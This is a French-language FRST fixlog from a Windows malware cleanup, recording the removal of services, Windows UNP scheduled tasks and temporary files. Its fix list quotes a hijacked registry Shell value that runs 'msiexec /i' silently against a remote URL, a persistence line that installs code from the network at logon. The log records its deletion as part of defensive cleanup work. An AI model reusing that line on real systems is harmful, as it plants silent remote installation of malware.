Résultats de correction de Farbar Recovery Scan Tool (x64) Version: 16-04-2017 Exécuté par Steven (16-04-2017 16:59:13) Run:1 Exécuté depuis C:\Users\Steven\Desktop Profils chargés: Steven (Profils disponibles: Steven & Administrateur) Mode d'amorçage: Normal ============================================== fixlist contenu: ***************** start CreateRestorePoint: CloseProcesses: HKU\S-1-5-21-309874020-4284787689-2479007716-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj1QMWJLNUJLMjIdMUE2FkU4OWE8MWQQNjIxOYNSNTH3MF== /q S3 catchme; \??\C:\Users\Steven\AppData\Local\Temp\catchmedhlp.sys [X] S3 dbx; system32\DRIVERS\dbx.sys [X] Task: {0A81B4F3-EC8E-4E4C-8A4A-AAF1FAE24F63} - System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\RunCampaignManager2 => C:\Windows\system32\UNP\UNPCampaignManager.exe [2017-04-02] (Microsoft Corporation) Task: {0E1AC438-6D6D-4A69-96C4-7290A692D331} - System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\OnIdle => C:\WINDOWS\system32\UNP\UNPUXLauncher.exe [2017-04-02] (Microsoft Corporation) Task: {4FF0B44E-D4C8-41A4-9E0C-1BA770C44FB2} - System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Logon => C:\WINDOWS\system32\UNP\UNPUXLauncher.exe [2017-04-02] (Microsoft Corporation) Task: {8CB51E35-574D-4392-87FF-F16C722F78F0} - \WPD\SqmUpload_S-1-5-21-309874020-4284787689-2479007716-1001 -> Pas de fichier Task: {93ABE1E0-42B2-4BD0-A83B-231F2CA18D18} - System32\Tasks\Microsoft\Windows\UNP\RunCampaignManager => C:\WINDOWS\System32\UNP\UNPCampaignManager.exe [2017-04-02] (Microsoft Corporation) Task: {AD48B3FA-5089-459F-B83B-261DAA1E5416} - System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Time => C:\WINDOWS\system32\UNP\UNPUXLauncher.exe [2017-04-02] (Microsoft Corporation) Task: {D0D64610-AC70-4804-9E8C-7C8CC81D6368} - System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Unlock => C:\WINDOWS\system32\UNP\UNPUXLauncher.exe [2017-04-02] (Microsoft Corporation) Task: {D586E128-4DFD-4093-BC27-82B626E9CF7F} - System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\OutOfIdle => C:\WINDOWS\system32\UNP\UNPUXLauncher.exe [2017-04-02] (Microsoft Corporation) EmptyTemp: end ***************** Le Point de restauration a été créé avec succès. Processus fermé avec succès. HKU\S-1-5-21-309874020-4284787689-2479007716-1001\Software\Microsoft\Windows\CurrentVersion\Policies\system\\Shell => valeur supprimé(es) avec succès HKLM\System\CurrentControlSet\Services\catchme => clé supprimé(es) avec succès catchme => service supprimé(es) avec succès HKLM\System\CurrentControlSet\Services\dbx => clé supprimé(es) avec succès dbx => service supprimé(es) avec succès HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0A81B4F3-EC8E-4E4C-8A4A-AAF1FAE24F63} => clé supprimé(es) avec succès HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0A81B4F3-EC8E-4E4C-8A4A-AAF1FAE24F63} => clé supprimé(es) avec succès C:\WINDOWS\System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\RunCampaignManager2 => déplacé(es) avec succès HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\RunCampaignManager2 => clé supprimé(es) avec succès HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{0E1AC438-6D6D-4A69-96C4-7290A692D331} => clé supprimé(es) avec succès HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{0E1AC438-6D6D-4A69-96C4-7290A692D331} => clé supprimé(es) avec succès C:\WINDOWS\System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\OnIdle => déplacé(es) avec succès HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\OnIdle => clé supprimé(es) avec succès HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{4FF0B44E-D4C8-41A4-9E0C-1BA770C44FB2} => clé supprimé(es) avec succès HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{4FF0B44E-D4C8-41A4-9E0C-1BA770C44FB2} => clé supprimé(es) avec succès C:\WINDOWS\System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Logon => déplacé(es) avec succès HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Logon => clé supprimé(es) avec succès HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8CB51E35-574D-4392-87FF-F16C722F78F0} => clé supprimé(es) avec succès HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8CB51E35-574D-4392-87FF-F16C722F78F0} => clé supprimé(es) avec succès HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\WPD\SqmUpload_S-1-5-21-309874020-4284787689-2479007716-1001 => clé supprimé(es) avec succès HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{93ABE1E0-42B2-4BD0-A83B-231F2CA18D18} => clé supprimé(es) avec succès HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{93ABE1E0-42B2-4BD0-A83B-231F2CA18D18} => clé supprimé(es) avec succès C:\WINDOWS\System32\Tasks\Microsoft\Windows\UNP\RunCampaignManager => déplacé(es) avec succès HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\RunCampaignManager => clé supprimé(es) avec succès HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{AD48B3FA-5089-459F-B83B-261DAA1E5416} => clé supprimé(es) avec succès HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AD48B3FA-5089-459F-B83B-261DAA1E5416} => clé supprimé(es) avec succès C:\WINDOWS\System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Time => déplacé(es) avec succès HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Time => clé supprimé(es) avec succès HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D0D64610-AC70-4804-9E8C-7C8CC81D6368} => clé supprimé(es) avec succès HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D0D64610-AC70-4804-9E8C-7C8CC81D6368} => clé supprimé(es) avec succès C:\WINDOWS\System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Unlock => déplacé(es) avec succès HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\Unlock => clé supprimé(es) avec succès HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D586E128-4DFD-4093-BC27-82B626E9CF7F} => clé supprimé(es) avec succès HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D586E128-4DFD-4093-BC27-82B626E9CF7F} => clé supprimé(es) avec succès C:\WINDOWS\System32\Tasks\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\OutOfIdle => déplacé(es) avec succès HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\UNP\Campaigns\{91be532c-f9f1-406a-9858-43697c6f437a}\OutOfIdle => clé supprimé(es) avec succès =========== EmptyTemp: ========== BITS transfer queue => 0 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 53402937 B Java, Flash, Steam htmlcache => 136231414 B Windows/system/drivers => 59551300 B Edge => 3032202 B Chrome => 547887996 B Firefox => 12216012 B Opera => 0 B Temp, IE cache, history, cookies, recent: Default => 0 B Users => 0 B ProgramData => 0 B Public => 0 B systemprofile => 211 B systemprofile32 => 0 B LocalService => 13250 B NetworkService => 5975530 B Steven => 17238552 B Administrateur => 0 B RecycleBin => 0 B EmptyTemp: => 796.8 MB données temporaires supprimées. ================================ Le système a dû redémarrer. ==== Fin de Fixlog 17:00:03 ====